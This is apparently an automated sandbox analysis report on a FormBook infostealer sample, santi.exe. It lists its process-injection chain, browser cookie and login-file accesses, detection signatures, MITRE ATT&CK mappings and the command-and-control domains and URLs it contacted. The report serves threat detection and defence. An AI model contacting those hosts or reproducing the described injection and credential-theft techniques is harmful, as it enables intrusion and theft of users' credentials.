                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\santi.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: NULL target: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe protection: read write
                Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: NULL target: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 7960
                Source: C:\Windows\SysWOW64\msdt.exe | Thread APC queued: target process: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                Source: C:\Users\user\Desktop\santi.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 5A2008
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_0031B106 LogonUserW,0_2_0031B106
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_002E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_002E3D19
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_0032411C SendInput,keybd_event,0_2_0032411C
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_003274BB mouse_event,0_2_003274BB
                Source: C:\Users\user\Desktop\santi.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\santi.exe"
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe | Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
                Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_0031A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0031A66C
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_003271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003271FA
                Source: santi.exe, lavilIyGJqg.exe, 0000000A.00000000.1638802910.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000002.3131725721.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3131997637.0000000001811000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: lavilIyGJqg.exe, 0000000A.00000000.1638802910.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000002.3131725721.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3131997637.0000000001811000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: lavilIyGJqg.exe, 0000000A.00000000.1638802910.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000002.3131725721.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3131997637.0000000001811000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: santi.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: lavilIyGJqg.exe, 0000000A.00000000.1638802910.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000002.3131725721.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3131997637.0000000001811000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_003065C4 cpuid 0_2_003065C4
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_0033091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0033091D
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_0035B340 GetUserNameW,0_2_0035B340
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_00311E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00311E8E
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_002FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002FDDC0

                Stealing of Sensitive Information

                Source: Yara match | File source: 7.2.svchost.exe.6f0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.svchost.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\msdt.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: santi.exe | Binary or memory string: WIN_81
                Source: santi.exe | Binary or memory string: WIN_XP
                Source: santi.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: santi.exe | Binary or memory string: WIN_XPe
                Source: santi.exe | Binary or memory string: WIN_VISTA
                Source: santi.exe | Binary or memory string: WIN_7
                Source: santi.exe | Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match | File source: 7.2.svchost.exe.6f0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.svchost.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000B.00000002.3128767729.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3132349262.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3131908170.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1716707325.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3132089430.00000000051D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1717464893.0000000005D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3132346426.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1716909243.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_00338C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00338C4F
                Source: C:\Users\user\Desktop\santi.exe | Code function: 0_2_0033923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0033923B

                MITRE ATT&CK matrix, listed per tactic (numbers in parentheses are the report's signature counts for that technique; techniques without a count are the matrix's unmatched placeholder cells):

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (11); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (251); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (11); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                [Behavior graph] Behavior Graph ID: 1561742, Sample: santi.exe, Start date: 24/11/2024, Architecture: WINDOWS, Score: 100. Process chain shown in the graph: santi.exe (signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools; Writes to foreign memory regions; 2 other signatures) starts svchost.exe (Maps a DLL or memory area into another process), which injects into lavilIyGJqg.exe (Found direct / indirect Syscall, likely to bypass EDR); lavilIyGJqg.exe starts msdt.exe (Tries to steal Mail credentials via file / registry access; Tries to harvest and steal browser information; Modifies the context of a thread in another process; 2 other signatures), which injects into lavilIyGJqg.exe and starts firefox.exe. The injected lavilIyGJqg.exe contacts www.losmason.shop (104.18.73.116, CLOUDFLARENETUS, United States), www.n-vis.group (90.156.201.74, MASTERHOST-AS, Russian Federation) and 7 other IPs or domains. Top-level graph signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures; 13 other IPs or domains.

                Antivirus detection for the submitted file (Source | Detection | Scanner | Label | Link):
                santi.exe | 61% | ReversingLabs | Win32.Trojan.AutoitInject
                santi.exe | 47% | Virustotal | Browse
                santi.exe | 100% | Joe Sandbox ML
                Dropped files: No Antivirus matches
                Unpacked PE files: No Antivirus matches
                Antivirus detection for contacted domains (Source | Detection | Scanner | Label | Link):
                www.n-vis.group | 1% | Virustotal | Browse
                www.gkfundeis.net | 1% | Virustotal | Browse
                SourceDetectionScannerLabelLink
                http://www.395608.men/vje0/0%Avira URL Cloudsafe
                http://www.espiritismo.info0%Avira URL Cloudsafe
                http://www.incgruporxat.click/ryxy/0%Avira URL Cloudsafe
                http://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpj0%Avira URL Cloudsafe
                http://www.losmason.shop/uktz/0%Avira URL Cloudsafe
                http://www.n-vis.group/lqir/?Yh8=pl0prhRpj&jp30l4Dh=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCxZ4ItMmlXe/h8K4U/QJ8SGl7q4T2nCxnDw61Qoew6MKI2b3ZeSUeI0MH0%Avira URL Cloudsafe
                http://www.incgruporxat.click/ryxy/?jp30l4Dh=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EIZllAsQAC3VF+SNvWHYn95kn9m51zzgbYIlZAQB9dsTK/N+poNP3vY+X&Yh8=pl0prhRpj0%Avira URL Cloudsafe
                http://www.espiritismo.info/4knb/0%Avira URL Cloudsafe
                https://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt0%Avira URL Cloudsafe
                http://www.gkfundeis.net/zd1g/?jp30l4Dh=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysjjiIjpBTY2hB1FuC/Ir2XG7/Tel/P9K0Q44ikc2AwKvVyevXJzSbTSZU&Yh8=pl0prhRpj0%Avira URL Cloudsafe
                http://www.holytur.net/oeev/0%Avira URL Cloudsafe
                http://www.holytur.net/oeev/?Yh8=pl0prhRpj&jp30l4Dh=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFpnLDL5BtGuLJV14GqWSwkNfFdanhR1yYduJIVu+RZBYfQm093zpAcY8s0%Avira URL Cloudsafe
                http://www.gkfundeis.net/zd1g/0%Avira URL Cloudsafe
                http://www.lirio.shop/qp0h/0%Avira URL Cloudsafe
                http://www.395608.men/vje0/?jp30l4Dh=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFAt85qKucOsoTOMySmy/TDo/wbifdtV6BKdCVmh/j8KvjULR4B+cyoPSP&Yh8=pl0prhRpj0%Avira URL Cloudsafe
                http://www.dialagiaja18.buzz/o7bo/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.n-vis.group
                90.156.201.74
                truefalseunknown
                www.gkfundeis.net
                62.116.130.8
                truefalseunknown
                5w23j7d4.n.fly8899.com
                207.148.38.19
                truefalse
                  unknown
                  www.lirio.shop
                  13.248.169.48
                  truefalse
                    unknown
                    dialagiaja18.buzz
                    66.29.148.78
                    truefalse
                      unknown
                      www.losmason.shop
                      104.18.73.116
                      truetrue
                        unknown
                        holytur.net
                        185.106.208.3
                        truefalse
                          unknown
                          www.incgruporxat.click
                          104.21.88.139
                          truefalse
                            unknown
                            espiritismo.info
                            3.33.130.190
                            truefalse
                              unknown
                              www.395608.men
                              unknown
                              unknownfalse
                                unknown
                                www.holytur.net
                                unknown
                                unknownfalse
                                  unknown
                                  www.espiritismo.info
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.dialagiaja18.buzz
                                    unknown
                                    unknownfalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITlQ8QyNNGCDeGdcegpNSZIk91cHVmbCJEIOdZhDE81ZlXIOxVN2wvJFBl&Yh8=pl0prhRpjtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.incgruporxat.click/ryxy/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.395608.men/vje0/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.losmason.shop/uktz/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.gkfundeis.net/zd1g/?jp30l4Dh=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysjjiIjpBTY2hB1FuC/Ir2XG7/Tel/P9K0Q44ikc2AwKvVyevXJzSbTSZU&Yh8=pl0prhRpjfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.incgruporxat.click/ryxy/?jp30l4Dh=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EIZllAsQAC3VF+SNvWHYn95kn9m51zzgbYIlZAQB9dsTK/N+poNP3vY+X&Yh8=pl0prhRpjfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.espiritismo.info/4knb/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.n-vis.group/lqir/?Yh8=pl0prhRpj&jp30l4Dh=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCxZ4ItMmlXe/h8K4U/QJ8SGl7q4T2nCxnDw61Qoew6MKI2b3ZeSUeI0MHfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.holytur.net/oeev/?Yh8=pl0prhRpj&jp30l4Dh=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFpnLDL5BtGuLJV14GqWSwkNfFdanhR1yYduJIVu+RZBYfQm093zpAcY8sfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.gkfundeis.net/zd1g/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.holytur.net/oeev/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.dialagiaja18.buzz/o7bo/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.lirio.shop/qp0h/false
                                      • Avira URL Cloud: safe
                                      unknown
